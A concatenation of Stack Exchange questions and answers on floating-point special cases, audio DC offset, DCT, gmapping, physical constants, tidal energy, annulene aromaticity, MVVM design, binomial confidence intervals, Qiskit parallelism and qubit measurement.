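Leaving one body unboosted ("the earth stays at home") shifts the separation by $vt$ and gives a different force, which is exactly the inconsistency in the original attempt.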
{ "domain": "physics.stackexchange", "id": 78071, "tags": "newtonian-mechanics, newtonian-gravity, coordinate-systems, inertial-frames, galilean-relativity" }
How does CPU determine Reserved Exponent cases?
Question: I assume that IEEE 754 arithmetic can be implemented in a branchless way. But how does the CPU determine the special cases (reserved exponent values)? The exponent and significand patterns are:

Exponent  Significand
11111111  000000000...  Inf
11111111  000001000...  NaN
00000000  000000000...  0
00000000  000001000...  Subnormal

Without any tricks which I don't know / understand, it should be expensive. EDIT It was too big for a comment, so I am editing the source question: I'm currently reading the ARM spec/documentation https://developer.arm.com/documentation/ddi0403/d/Application-Level-Architecture/Application-Level-Programmers--Model/The-optional-Floating-point-extension/Floating-point-data-types-and-arithmetic?lang=en#BEIBFIBJ and the especially interesting part is the FPUnpack() pseudocode. If I understand correctly, the CPU doesn't have intrinsics / instructions for the special cases, but the compiler that produces machine code should validate the result from the registers (VFP for old ones and NEON for new). Here is an example I found from the ARM team: https://github.com/ARM-software/ComputeLibrary/blob/8f587de9214dbc3aee4ff4eeb2ede66747769b19/include/CL/cl_half.h#L135. Am I right? EDIT: Nope, I'm not right, according to this answer: https://stackoverflow.com/questions/61646510/how-does-the-cpu-cast-a-floating-point-x87-i-think-value. But it's still the question how the CPU registers handle special cases... Answer: Not really. There are eight bits to check in each of two numbers, usually, to see whether there is a special case. For infinity/NaN you don't need to do the normal operation anymore, so the rest is not time critical. More time critical is normalising the mantissa for a zero exponent. But there are processors that assume these cases are so rare that many of them can be handled by an interrupt (not directly in hardware, but by executing code).
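The exponent/significand test described above can be shown on the raw bits in a few lines (stdlib only). The question's table is for single precision with an 8-bit exponent; the same test on a binary64 double, as below, just uses the 11-bit exponent field instead.

```python
import struct

def classify(x):
    bits = struct.unpack('<Q', struct.pack('<d', x))[0]
    exponent = (bits >> 52) & 0x7FF       # 11 exponent bits for binary64
    mantissa = bits & ((1 << 52) - 1)     # 52 significand bits
    if exponent == 0x7FF:                 # all-ones exponent: Inf or NaN
        return 'inf' if mantissa == 0 else 'nan'
    if exponent == 0:                     # all-zeros exponent: 0 or subnormal
        return 'zero' if mantissa == 0 else 'subnormal'
    return 'normal'

print(classify(float('inf')), classify(float('nan')),
      classify(0.0), classify(5e-324), classify(1.5))
# -> inf nan zero subnormal normal
```

In hardware the two comparisons against the all-ones and all-zeros patterns are cheap wide AND/OR reductions over the exponent bits, done in parallel with the start of the normal datapath, which is why the checks themselves are not the expensive part.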
{ "domain": "cs.stackexchange", "id": 20050, "tags": "cpu, floating-point" }
Audio silence on 1.0
Question: I have audio files with silence at 1.0 (max amplitude). I attach an example of the audio waveform. I don't know why it is at 1.0. How can I convert it to have silence at 0 (as usual)? I noted that at the beginning of the waveform it starts from 0 and goes to 1.0 - any ideas why? The files are telephone recordings; they are sampled at 8 kHz and coded with GSM. I don't have more information about the recording procedure. Answer: In addition to Olli's suggestion, it might also be a by-product of the encoder's processing. Removing this offset would amount to a simple removal of the DC component. This is practically done with a high-pass filter with a cut-off (or rather pass-through) near zero Hertz. If you are working in Audacity, guessing by your screenshot, this is done by Effect->Normalise, and from the window that pops up, make sure that you check "Remove DC Offset". In terms of digital signal processing, you can calculate the arithmetic mean of the whole sample and then subtract it from all values. (Please note: This is assuming a constant DC offset across the recording. If you also happen to have DC drift, it would be better to perform a "best line fit" to the whole sample and then subtract that estimate from the whole sample to "align" it back to zero.) Hope this helps.
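A minimal sketch of the mean-subtraction approach for the constant-offset case, on a synthetic "telephone" signal at 8 kHz (the 440 Hz tone and the 1.0 offset are illustrative):

```python
import math

fs = 8000
offset = 1.0  # the unwanted silence level
signal = [offset + 0.25 * math.sin(2 * math.pi * 440 * n / fs)
          for n in range(fs)]  # one second of a 440 Hz tone riding on 1.0

mean = sum(signal) / len(signal)     # estimate of the DC component
centred = [s - mean for s in signal] # silence now sits at 0

print(mean)  # close to the 1.0 offset, since the tone averages to zero
```

For drifting offsets, the same idea generalises to subtracting a least-squares line fit instead of a single mean, as the note above says.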
{ "domain": "dsp.stackexchange", "id": 3365, "tags": "audio" }
The magnitude of taking discrete cosine transform of an image two times is similar to the original
Question: Consider the following:

im = double(imread('lena.bmp'));
subplot(1,3,1), imshow(im,[]), title('original');
t1 = dct2(im);
subplot(1,3,2), imshow(log(abs(t1)+1),[]), title('DCT transform');
t2 = dct2(t1);
subplot(1,3,3), imshow(t2,[]), title('DCT(DCT) transform');

the output is shown below: Could anyone explain why the result of the second-order DCT is similar to the original image? Thanks in advance! P.S. The same thing happens with every 2N'th DCT. Answer: It's because the inverse discrete cosine transform (IDCT) is almost identical to the forward DCT. So taking the transform twice will be similar to the original signal. In fact, if you state which DCT type (DCT-I, DCT-II etc.) you have used, one can show the effect more explicitly.
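A numpy sketch of this (building the transform matrices directly rather than using MATLAB's dct2): for the orthonormal DCT-II, the inverse is simply the transpose, which is itself a cosine matrix (the DCT-III), so a second forward DCT lands close to the inverse transform. For the orthonormal DCT-I the matrix is symmetric as well as orthogonal, so applying it twice reproduces the signal exactly.

```python
import numpy as np

def dct2_matrix(N):
    # orthonormal DCT-II: C[k, n] = s_k * sqrt(2/N) * cos(pi*(n+0.5)*k/N)
    n = np.arange(N)
    C = np.sqrt(2.0 / N) * np.cos(np.pi * (n[None, :] + 0.5) * n[:, None] / N)
    C[0, :] /= np.sqrt(2.0)
    return C

def dct1_matrix(N):
    # orthonormal DCT-I (N >= 2): symmetric AND orthogonal, hence self-inverse
    k = np.arange(N)
    w = np.ones(N)
    w[0] = w[-1] = 1.0 / np.sqrt(2.0)
    return np.sqrt(2.0 / (N - 1)) * np.outer(w, w) * np.cos(
        np.pi * np.outer(k, k) / (N - 1))

N = 64
x = np.random.default_rng(0).standard_normal(N)
C, T = dct2_matrix(N), dct1_matrix(N)

ok_ii = np.allclose(C.T @ (C @ x), x)  # DCT-II inverse = transpose (DCT-III)
ok_i  = np.allclose(T @ (T @ x), x)    # DCT-I applied twice = identity
print(ok_ii, ok_i)  # -> True True
```

This is the "almost identical" statement made precise: forward and inverse DCT-II differ only by a transpose of a cosine matrix, and for DCT-I they coincide exactly.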
{ "domain": "dsp.stackexchange", "id": 4335, "tags": "dct, image-compression" }
how to make the map thicker? (gmaping params)
Question: I'm using the gmapping/slam_gmapping node to create the map, together with ros_arduino_bridge and neato_laser_driver; with those, /odom, /scan, and /tf can be published. I referred to the parameter configuration of rbx1 (here) and I found that:

the map is drawn lightly.
there are many emissive lines which do not match reality and should be removed.

Can you guys tell me which parameters of slam_gmapping influence these features? Thank You Very Much!! ps: I'm using ROS Indigo and the Neato XV-11 laser scanner. THX!! Originally posted by sonictl on ROS Answers with karma: 287 on 2016-11-03 Post score: 0 Original comments Comment by sonictl on 2016-11-03: The map did not get denser even when I kept the robot at one position for 1 hour. Answer: The emissive lines typically come from laser scanner max-range measurements. Some laser scanners map scan errors to max range as well, which could lead to this problem. I haven't worked with the Neato myself, so I cannot tell if this is the problem here. Also, typically, you don't update the map if you don't move the robot. gmapping has three parameters for when to trigger an update:

linearUpdate
angularUpdate
temporalUpdate

If you want to update also while standing still, you should set temporalUpdate to something other than -1.0 (default), which disables temporal updates. Originally posted by mgruhler with karma: 12390 on 2016-11-03 This answer was ACCEPTED on the original site Post score: 0 Original comments Comment by sonictl on 2016-11-17: thx mig! I think this problem may not be so simple. If the map scan errors caused the emissive lines, there should be some black points appearing at the ends of the emissive lines, more or less. Nevertheless, there are no black points at all.
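For concreteness, these update parameters are usually set in a launch file. The fragment below is hypothetical: the parameter names are real slam_gmapping parameters, but the values are only starting points to experiment with; maxUrange is the one that controls how max-range readings, the usual cause of the emissive lines, are handled.

```xml
<!-- Hypothetical launch fragment; tune values for your own robot. -->
<node pkg="gmapping" type="slam_gmapping" name="slam_gmapping" output="screen">
  <!-- keep below the XV-11's max range so max-range returns are dropped -->
  <param name="maxUrange"      value="4.5"/>
  <!-- process a scan every 0.2 m travelled ... -->
  <param name="linearUpdate"   value="0.2"/>
  <!-- ... or every 0.25 rad of rotation -->
  <param name="angularUpdate"  value="0.25"/>
  <!-- also update every 2 s while standing still (-1.0 disables this) -->
  <param name="temporalUpdate" value="2.0"/>
</node>
```

With temporalUpdate enabled, the map should keep densifying even when the robot sits still, which addresses the comment about the map not getting denser after an hour in one spot.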
{ "domain": "robotics.stackexchange", "id": 26137, "tags": "navigation, gmapping" }
Perpetual Mobile and Gravitation
Question: I have a fundamental question about what is called the "law of conservation of energy". We all hear about tidal power stations which use tidal power. The source of the tidal power comes from the changes in the gravity field between the moon and the earth. Allegedly, because of the law of conservation of energy, this influence must cause some energy loss in the moon or the earth. And indeed we know that the moon's orbit gets longer and slower over time. My question is: must we really say that the energy of the tide and the loss of the kinetic energy of the moon are equal? According to the general theory of relativity, gravitation is the spacetime-curvature effect of a big object. This curvature is not "energy consuming", which basically means two objects can spin around each other in space forever, even though such a spin is a change in momentum that should consume energy according to the classical theory. The question is: are the tidal effects caused by that "miracle" of perpetual momentum change indeed "energy consuming"? Let's imagine that instead of the moon there is a black hole, and the earth is spinning around it. This would cause tidal effects exactly like those caused by the moon. This energy comes from the black hole, which means that the black hole's mass must be reduced according to the equation $E=mc^2$. This is against what we know about black holes, which never lose any mass. But if the answer is "no", that means, in other words, that tidal power stations are a kind of "Perpetuum Mobile" - creating energy from nothing. This is of course a weirder conclusion. Answer:

My question is: must we really say that the energy of the tide and the loss of the kinetic energy of the moon are equal?

The answer is obviously "YES." It must be so.
I would refer at this point to these words:

Nature is relentless and unchangeable, and it is indifferent as to whether its hidden reasons and actions are understandable to man or not. - Galileo Galilei

Because the answer I have on my desk right now is (not yet) "mainstream physics", quite similarly to how Galileo's thoughts weren't either at the time. You ask further:

The question is: are the tidal effects caused by that "miracle" of perpetual momentum change indeed "energy consuming"?

Still: YES. Yet, the building of tidal power stations shouldn't have any impact on this energy consumption. The very same energy would otherwise only be turned into heat through viscous losses in the water. So there is no need to argue against tidal power. There is no perpetual mobile but one: the whole universe. And the existence of this "perpetual mobile" is proved by many. But no: though two objects could theoretically spin in space forever, in reality they won't. They are losing matter, and thus also energy, all the time. Slowly but surely, down to the drain. Gas, fluid or solid, it doesn't matter. It all comes to an end. And this is the only thing that ever allowed a new start, and thus development. Ps. The only thing which made Galileo's physics not mainstream physics at the time was the fact that he was actually the only one who had observed certain phenomena in detail. I encourage you to calculate the time which would be needed to stop the rotation if the tides lose only 1% of their energy per shift, or 0.01%, or whatever number makes them different from a perpetual mobile. After doing this, I encourage you to look at more details. If interested, contact me and I will send you a few hints to start with. The smallest detail can cause the turn even of the greatest mainstream.
{ "domain": "physics.stackexchange", "id": 23082, "tags": "energy, energy-conservation, relativity, tidal-effect, perpetual-motion" }
The expression of the fine-structure constant post-May 2019
Question: Those of us who are engineers were never fond of the common expression from physicists that $$ \alpha = \frac{e^2}{\hbar c} $$ implying that the units of the elementary charge are in "$\sqrt{hc}$". Those of us that are a little more anal (can't spell "analysis" without "anal") about dimension of physical "stuff" and units know that the complete expression for the fine-structure constant is $$ \alpha = \frac{e^2}{(4 \pi \varepsilon_0) \hbar c} $$ but the seasoned physicists are thinking in terms of electrostatic cgs units where the unit of charge is defined so that the Coulomb constant $k_\mathrm{e} = \frac{1}{4 \pi \varepsilon_0}$ is set to dimensionless 1. That seemed okay before May 20, 2019 when all of the "variables" in $\varepsilon_0 = \frac{1}{c^2 \mu_0}$ were defined constants and it didn't seem to be a whoop to use a different definition of a dimensionful constant $\varepsilon_0$. But now $\varepsilon_0$ is a measured universal constant that is expressed with an error specification and is derived from $\alpha$ anyway. Are these HEP physicists gonna continue saying $\alpha = \frac{e^2}{\hbar c}$ or will they have to be more proper with their use of "constants" and dimensionality? Will they continue to say that the units of the elementary charge are "$\sqrt{hc}$"? Answer: My prediction is that the 2019 metrological redefinitions will have absolutely no impact on how theoretical physicists use natural units. They will continue to think of $\hbar$ and $c$ as $1$, and of $e$ and $\alpha$ as dimensionless, and there will be nothing improper about doing so. Most will continue to think of SI units as a bizarre historical monstrosity.
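The dimensionful bookkeeping in the complete SI expression can be checked in a few lines (not from the original post; e, h, and c are exact by the 2019 definitions, while the $\varepsilon_0$ value below is the measured CODATA 2018 figure):

```python
import math

e    = 1.602176634e-19   # C,   exact since 2019
h    = 6.62607015e-34    # J s, exact since 2019
c    = 299792458.0       # m/s, exact
eps0 = 8.8541878128e-12  # F/m, measured (CODATA 2018)

hbar  = h / (2 * math.pi)
alpha = e**2 / (4 * math.pi * eps0 * hbar * c)  # full SI expression

print(1 / alpha)  # ~137.036
```

Dropping the $4\pi\varepsilon_0$ factor, as the Gaussian-units shorthand does, only works because that shorthand redefines the unit of charge; in SI the factor is essential to make $\alpha$ come out dimensionless and equal to about 1/137.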
{ "domain": "physics.stackexchange", "id": 59285, "tags": "physical-constants, absolute-units" }
ViewModel constructor with many parameters
Question: I have some ViewModels that have a lot of parameters like this one: public class ProductsMainViewModel : NotificationObject, IActiveAware, ... { public ProductsMainViewModel(IProductRepository productRepository, IWarehouseRepository warehouseRepository, IUnitOfMeasureRepository unitOfMeasureRepository, IProductCategoryRepository productCategoryRepository, IProductPriceRepository productPriceRepository, IPriceLevelRepository priceLevelRepository, ICodingRepository codingRepository, ICategoryRepository categoryRepository, IDialogService dialogService, Logging.ILoggerFacade logger, IRegionManager regionManager, IJsonSerializer jsonSerializer, ICodeService codeService, IEventAggregator eventAggregator) { // ... } } (All repositories have the same instance of IUnitOfWork.) Instantiating this is done by the IUnityContainer, but there are some dialogs that get called in this ViewModel, whose repositories must share the same IUnitOfWork as the current ViewModel: var viewModel = new ProductViewModel(_warehouseRepository, _unitOfMeasureRepository, _productCategoryRepository, _priceLevelRepository, _productPriceRepository, _codingRepository, _dialogService, _codeService, _jsonSerializer); var result = _dialogService.ShowDialog("ProductWindow", viewModel); if (result == true) { // ... } So I decided to pass the parameters manually. I found it a good idea to "not reference any IoC container" in my ViewModel, as suggested here. The benefit of this approach is that the ViewModel doesn't have any knowledge of the (Unity) container. Also, in terms of understanding the application design, the dependencies of the ViewModel are easy to see since they are in the constructor. Well, any ideas on how to reduce the number of parameters? Any particular design pattern? Is it a good idea to create an 'IFooRepositoriesContext' and put the related repositories in it?
Answer: I agree with what Jesse said in that grouping your repositories into one related context is one approach, and it may be the one best suited to your case. However, I'd like to offer another approach, and that would be to use composition in your ViewModel and have it contain several smaller ViewModels. Also, in terms of understanding the application design the dependencies of the ViewModel are easy to see since they are in the constructor I don't think that splitting the ViewModels up into smaller ones will break this statement. However, I don't necessarily agree with it either: why should the ViewModel depend on anything? What I do think splitting your ViewModels up (where possible, of course) does is allow you to potentially re-use any ViewModel, while also making each ViewModel specific to a particular part of the design/functional requirements. So if I were to continue with the IFooRepositoriesContext approach, I might consider something like this: public class ProductViewModel { public string ProductOnlyDetail { get; set; } public ProductDescriptionViewModel Description { get; set; } public ProductPriceViewModel Price { get; set; } } or, if you wanted to make it explicit that the ProductViewModel always needs parameters, then create the constructor to take the IFooRepositoriesContext: public ProductViewModel(IFooRepositoriesContext context) { // and build your view model there } Your sub-ViewModels themselves might look like (examples only, of course): public class ProductDescriptionViewModel { public ProductDescriptionViewModel(IProductRepository productRepository, IWarehouseRepository warehouseRepository, IUnitOfMeasureRepository unitOfMeasureRepository, IProductCategoryRepository productCategoryRepository) { } public string Name { get; set; } // etc } public class ProductPriceViewModel { public decimal Price { get; set; } public string Currency { get; set; } // etc public ProductPriceViewModel(IProductPriceRepository productPriceRepository, IPriceLevelRepository priceLevelRepository) { } } Then your code might be something like: var viewModel = new ProductViewModel { Description = new ProductDescriptionViewModel(productRepository, warehouseRepository, unitOfMeasureRepository, productCategoryRepository), Price = new ProductPriceViewModel(productPriceRepository, priceLevelRepository), ProductOnlyDetail = "Hello" }; var result = _dialogService.ShowDialog("ProductWindow", viewModel); if (result == true) { // ... } But there are some dialogs that get called in this ViewModel I assume this was a grammatical error and you don't actually call dialogs from within the ViewModel itself? If so, I seriously think you should reconsider your approach to using the ViewModels. ViewModelBuilder or some other approach. Aside from this, I would consider having another object that is responsible for building up your ViewModels. Of course it depends on the design and requirements of the system, but I would be asking: will the ViewModel always get its data from x? Is there any reason why it couldn't get it from y? If yes, then having the ViewModel build itself really limits it to the knowledge of where and what data to obtain, even if the "where" of that data is abstracted out via interfaces. There are existing mapping frameworks out there that may offer assistance if you are worried about the class explosion this might cause. Hope this helps give a different perspective or some more food for thought :)
{ "domain": "codereview.stackexchange", "id": 2457, "tags": "c#, mvvm" }
Calculating confidence interval for model accuracy in a multi-class classification problem
Question: In the book Applied Predictive Modeling by Max Kuhn and Kjell Johnson, there is an exercise concerning the calculation of a confidence interval for model accuracy. It reads as follows. One method for understanding the uncertainty of a test set is to use a confidence interval. To obtain a confidence interval for the overall accuracy, the base R function binom.test can be used. It requires the user to input the number of samples and the number correctly classified to calculate the interval. For example, suppose a test set sample of 20 oil samples was set aside and 76 were used for model training. For this test set size and a model that is about 80% accurate (16 out of 20 correct), the confidence interval would be computed using > binom.test(16, 20) Exact binomial test data: 16 and 20 number of successes = 16, number of trials = 20, p-value = 0.01182 alternative hypothesis: true probability of success is not equal to 0.5 95 percent confidence interval: 0.563386 0.942666 sample estimates: probability of success 0.8 In this case, the width of the 95% confidence interval is 37.9%. Try different sample sizes and accuracy rates to understand the trade-off between the uncertainty in the results, the model performance, and the test set size. The dataset used here contains samples belonging to 7 classes. Since this is a multi-class classification problem, not a binary one, shouldn't the probability of success in the null hypothesis be equal to 1/7? Is there a reason why the authors have chosen 1/2 as the probability of success? Answer: The author uses binom.test. The binomial test is used when an experiment has two possible outcomes and you have an idea of what the probability of success is; as with other statistical tests, you measure whether the success rate in the observed set differs significantly from what was expected. From here it gets a bit more subtle: the author is trying "to obtain a confidence interval for **the overall accuracy**". 
Therefore, the test is not about the accuracy per group (each of the seven oil types) but about the model as a whole: whether it predicts correctly or not. So you are dealing with a binary outcome, success vs. failure, and you calculate the confidence interval of that. (Note that the hypothesised probability of 0.5 only affects the quoted p-value; the Clopper-Pearson confidence interval reported by binom.test is computed from the data alone and does not depend on it.) If you play with the data and fit models with different data sizes (more/fewer than 76 data points), you will see that using more data leads to a narrower confidence interval. How important confidence intervals are for predictive analysis is another question, which I encourage you to ask on the sister community https://stats.stackexchange.com/
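For readers without R at hand, the interval that binom.test prints is the exact (Clopper-Pearson) interval, and it can be reproduced from scratch by bisecting on the binomial CDF. A sketch, using only the Python standard library:

```python
import math

def binom_cdf(k, n, p):
    """P(X <= k) for X ~ Binomial(n, p)."""
    return sum(math.comb(n, i) * p**i * (1 - p)**(n - i) for i in range(k + 1))

def _root(f, increasing):
    """Bisect a monotone f on [0, 1] for its sign change."""
    lo_, hi_ = 0.0, 1.0
    for _ in range(100):
        mid = (lo_ + hi_) / 2
        if (f(mid) < 0) == increasing:
            lo_ = mid
        else:
            hi_ = mid
    return (lo_ + hi_) / 2

def clopper_pearson(k, n, alpha=0.05):
    """Exact CI for a binomial proportion, as printed by R's binom.test."""
    lower = 0.0 if k == 0 else _root(
        lambda p: (1 - binom_cdf(k - 1, n, p)) - alpha / 2, increasing=True)
    upper = 1.0 if k == n else _root(
        lambda p: binom_cdf(k, n, p) - alpha / 2, increasing=False)
    return lower, upper

lo, hi = clopper_pearson(16, 20)
print(lo, hi)  # ~0.5634, ~0.9427, matching the R output above
```

The null probability never enters this computation, which is the numerical counterpart of the point made in the answer.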
{ "domain": "datascience.stackexchange", "id": 9654, "tags": "predictive-modeling, multiclass-classification, accuracy, hypothesis-testing" }
How do I visualise bicyclo[4.4.1]undeca-1,3,5,7,9-pentaene?
Question: While reading my organic chem book, I came across this compound: Since this is an exercise question, I do not know the name of this compound. I am unable to visualize this compound (how it looks coming out of the plane of the paper), as I have never come across two rings joined by a bridge-like structure; my book says it is a methylene bridge. I appreciate your assistance in determining the structure of this compound. Answer: This compound is 1,6-methano[10]annulene, and a classic example of an unusual compound displaying aromaticity. Aromaticity requires the pi-system to lie in a plane. One might speculate that [10]annulene (shown below) would be aromatic, because it contains a cyclic pi-system of 10 electrons, which appears to be planar. However, because the hydrogens indicated are trying to occupy the same space, the compound is forced out of planarity, and the compound is non-aromatic. Bianchi and coworkers reported the crystal structure of 1,6-methano[10]annulene. In this compound, the hydrogens that clash in [10]annulene are replaced by a methylene (CH2) group. From directly above, the compound looks basically like naphthalene, with a little extra space in the middle. More interestingly, from the side, it's clear that the atoms of the 10-membered ring are nearly planar, with that methylene bridge oriented perpendicular to the plane. Reference: Structure of 1,6-methano[10]annulene, R. Bianchi, T. Pilati and M. Simonetta, Acta Cryst. (1980). B36, 3146-3148, https://doi.org/10.1107/S0567740880011089
{ "domain": "chemistry.stackexchange", "id": 10582, "tags": "organic-chemistry, molecular-structure, molecules" }
Are there anti virtual particles (mediator bosons)?
Question: I have read these questions: Can bosons have anti-particles? Is there a possibility for discovery of anti-graviton, i.e. the graviton antiparticle? Antiparticle for Higgs boson? According to the accepted theory, the SM, all elementary particles have their antiparticle counterparts, and so do the mediator bosons. The EM force is mediated by virtual photons. Gravity is mediated by theoretical virtual gravitons. The strong force is mediated by virtual gluons. The weak force is mediated by virtual W and Z bosons. All these bosons have anti versions according to the SM: photons are their own antiparticles, and gravitons too; gluons have their anti-gluon versions; the W and Z bosons also have their anti versions. Now since these virtual bosons mediate the fundamental forces, are there anti virtual bosons? Question: are there anti virtual bosons? Do these mediate the anti forces? Answer: are there anti virtual bosons? As you know, a virtual particle is a mathematical construct and is connected with the real particle of its name by the quantum numbers identifying the particle. Also, you should know that all particles can be virtual within Feynman diagrams if they are not among the incoming and outgoing legs. In these Compton scattering diagrams it is the electron that is virtual, or the positron, when the e represents a positron in positron-gamma scattering. So yes, antiparticles can also be mediator virtual particles in an interaction do these mediate the anti forces? There are no anti forces; there are attractive or repulsive end results in the interactions studied and modeled with Feynman diagrams in order to calculate the cross sections or decay rates. The gauge bosons of the four macroscopic forces, identified with the electromagnetic/weak/strong and gravity (if quantized), are just virtual exchanges in the lowest order diagrams in simple particle-particle interactions. It is only the quantum numbers that they carry, and their mass in the propagator, which identify them. 
The mass is the same for the W+ and the W-, and it enters in the propagator; just the charge characterizes the virtual particle.
{ "domain": "physics.stackexchange", "id": 57572, "tags": "particle-physics, antimatter, interactions, virtual-particles, carrier-particles" }
Parallelizing Qiskit not working
Question: I hope this is the right place to ask this kind of question. I'm using the Aer simulator in Qiskit to analyze the state vector of some circuits. My program is very parallelizable, but when I try to run these Qiskit calculations in parallel (using the multiprocessing library in Python), in certain situations the call to Qiskit to simulate the circuit hangs indefinitely. For instance, I may have something like this: from multiprocessing import Pool def parallel(circ2): simulator2 = Aer.get_backend('aer_simulator') result2 = simulator2.run(circ2).result() print(result2) circ1 = ... #some kind of circuit simulator1 = Aer.get_backend('aer_simulator') result1 = simulator1.run(circ1).result() print(result1) circs_arr = [...] #some list of different circuits with Pool(5) as p: p.map(parallel,circs_arr) The above code does not work. The parallelized call to run the circuit (within the function) hangs indefinitely. However, if I remove the first run of the simulator (that produces result1), then everything is fine and works as expected. Does anyone know how I can fix this? I've read that the problem might have something to do with Qiskit Aer utilizing multiprocessing for its own purposes, so running Aer with multiprocessing can cause a conflict. However, my attempts to turn off Qiskit's internal multiprocessing have not worked, or have not fixed my problem. Answer: I took a closer look under the hood of Qiskit, and I think I've discovered the issue. It looks like Qiskit uses the concurrent.futures library to do its concurrency/parallelization. There seems to be some kind of conflict when using the concurrent.futures library together with the multiprocessing library. I was able to get my code to work by switching from multiprocessing to concurrent.futures to handle my parallelization. The only changes that need to be made for the above code to work are to add from concurrent import futures and replace Pool(5) with futures.ThreadPoolExecutor(max_workers=5).
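To make the shape of the fix concrete, here is a runnable sketch of the working version. The simulator call is replaced by a stand-in function so the snippet is self-contained; in the real program the body of simulate would build the Aer backend and call run as shown in the question:

```python
from concurrent.futures import ThreadPoolExecutor

def simulate(circ):
    # Stand-in for the real work:
    #   simulator = Aer.get_backend('aer_simulator')
    #   return simulator.run(circ).result()
    return circ * 2

circs_arr = [1, 2, 3, 4, 5]  # stand-ins for the list of circuits
with ThreadPoolExecutor(max_workers=5) as executor:
    results = list(executor.map(simulate, circs_arr))
print(results)  # [2, 4, 6, 8, 10]
```

executor.map plays the same role as Pool.map but avoids spawning extra processes that conflict with Aer's own parallelism.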
{ "domain": "quantumcomputing.stackexchange", "id": 3244, "tags": "qiskit" }
Measuring in standard basis meaning
Question: What does it mean to measure a qubit (or multiple qubits) in the standard basis? Answer: A $1$-qubit system, in general, can be in a state $a|0\rangle+b|1\rangle$ where $|0\rangle$ and $|1\rangle$ are basis vectors of a two dimensional complex vector space. The standard basis for measurement here is $\{|0\rangle,|1\rangle\}$. When you are measuring in this basis, with $\frac{|a|^2}{|a|^2+|b|^2}\times 100\%$ probability you will find that the state after measurement is $|0\rangle$ and with $\frac{|b|^2}{|a|^2+|b|^2}\times 100\%$ you'll find that the state after measurement is $|1\rangle$. But you could carry out the measurement in some other basis too, say $\{\frac{|0\rangle+|1\rangle}{\sqrt{2}},\frac{|0\rangle-|1\rangle}{\sqrt{2}}\}$, but that wouldn't be the standard basis. Exercise: Express $a|0\rangle+b|1\rangle$ in the form $c(\frac{|0\rangle+|1\rangle}{\sqrt{2}})+d(\frac{|0\rangle-|1\rangle}{\sqrt{2}})$ where $a,b,c,d\in\Bbb C$. If you measure in this basis, the probability of ending in the state $\frac{|0\rangle+|1\rangle}{\sqrt{2}}$ after the measurement is $\frac{|c|^2}{|c|^2+|d|^2}\times 100\%$ and the probability of ending in the state $\frac{|0\rangle-|1\rangle}{\sqrt{2}}$ is $\frac{|d|^2}{|c|^2+|d|^2}\times 100\%$. Similarly, for a $2$-qubit system the standard basis would be $\{|00\rangle,|01\rangle,|10\rangle,|11\rangle\}$ and its general state can be expressed as $\alpha|00\rangle + \beta|01\rangle + \gamma|10\rangle + \delta|11\rangle$. When you measure this in the standard basis you can easily see that the probability of ending up in the state (say) $|00\rangle$ will be $\frac{|\alpha|^2}{|\alpha|^2+|\beta|^2+|\gamma|^2+|\delta|^2}\times 100\%$. Similarly you can deduce the probabilities for the other states. You should be able to extrapolate this same logic to general $n$-qubit states now. Feel free to ask questions in the comments.
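The arithmetic above is easy to check numerically. A small sketch in plain Python, with the state given by its amplitudes $a$ and $b$ (the solution to the exercise, $c=(a+b)/\sqrt{2}$ and $d=(a-b)/\sqrt{2}$, is used for the second basis):

```python
import math

def probs_standard(a, b):
    """Measurement probabilities in the {|0>, |1>} basis."""
    n = abs(a) ** 2 + abs(b) ** 2          # normalisation
    return abs(a) ** 2 / n, abs(b) ** 2 / n

def probs_plus_minus(a, b):
    """Probabilities in the {|+>, |->} basis, via c=(a+b)/sqrt(2), d=(a-b)/sqrt(2)."""
    c = (a + b) / math.sqrt(2)
    d = (a - b) / math.sqrt(2)
    return probs_standard(c, d)

# |0> is certain in the standard basis but 50/50 in the |+>,|-> basis:
print(probs_standard(1, 0))    # (1.0, 0.0)
print(probs_plus_minus(1, 0))  # ~(0.5, 0.5)
```

This makes the key point of the answer tangible: the same state gives different outcome statistics depending on which basis you measure in.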
{ "domain": "quantumcomputing.stackexchange", "id": 200, "tags": "quantum-state, measurement" }
What is the meaning of hand crafted features in computer vision problems?
Question: Are these features manually labelled by humans, or is there a technique for obtaining them? Is this related to learned features? Answer: "Hand Crafted" features refer to properties derived using various algorithms from the information present in the image itself. For example, two simple features that can be extracted from images are edges and corners. A basic edge detector algorithm works by finding areas where the image intensity "suddenly" changes. To understand that we need to remember that a typical image is nothing but a 2D matrix (or multiple matrices or a tensor or n-dimensional array, when you have multiple channels like Red, Green, Blue, etc). In the case of an 8-bit gray-scale image (or a "black and white" image, although this latter definition is not quite accurate) the image is typically a 2D matrix with values ranging from 0 to 255, with 0 being completely black and 255 being completely white. Now imagine an image of a blackboard set against a totally white wall. As we move left-to-right in the image the values in one of the rows of the matrix might look like 255-255-255... since we will be "moving" along the wall. However, when we are about to hit the blackboard in the image it might look like 255-255-0-0-0... As you might have guessed, the blackboard "begins" in the image where the zeros start. In other words, the "intensity" of the image along the "x" axis has dropped rather suddenly (a very large negative gradient along x), which means a typical edge detector will consider it to be a good candidate for an edge. The algorithm that we just saw is only the most basic of algorithms, and others like Harris corners and HOG descriptors use slightly more "sophisticated" algorithms. Actually, even the Canny edge detector does a lot more than what I just described, but that is beside the point. 
The point is that once you understand that an image is nothing more than a data matrix, or an n-dimensional array, the other algorithms are not that difficult to understand either. As regards your last question: Is this related to learned features? The "handcrafted features" were commonly used with "traditional" machine learning approaches for object recognition and computer vision like Support Vector Machines, for instance. However, "newer" approaches like convolutional neural networks typically do not have to be supplied with such hand-crafted features, as they are able to "learn" the features from the image data. Or to paraphrase Geoff Hinton, such feature extraction techniques were "what was common in image recognition before the field became silly".
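The blackboard-against-a-wall example can be turned into a toy "edge detector" in two lines: difference a row of intensities and threshold the magnitude of the change. A minimal sketch:

```python
# One row of an 8-bit grayscale image: white wall, then a blackboard.
row = [255, 255, 255, 255, 0, 0, 0]

# Horizontal gradient: difference between neighbouring pixels.
grad = [row[i + 1] - row[i] for i in range(len(row) - 1)]

# An "edge" is wherever the intensity changes sharply.
edges = [i for i, g in enumerate(grad) if abs(g) > 128]
print(edges)  # [3], the wall/blackboard boundary
```

Real detectors smooth the image first and use 2D gradient operators, but the core idea of a hand-crafted feature, a fixed rule applied to the pixel values, is exactly this.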
{ "domain": "datascience.stackexchange", "id": 1991, "tags": "machine-learning, feature-selection, computer-vision, feature-engineering, convolutional-neural-network" }
Extract feature area from image
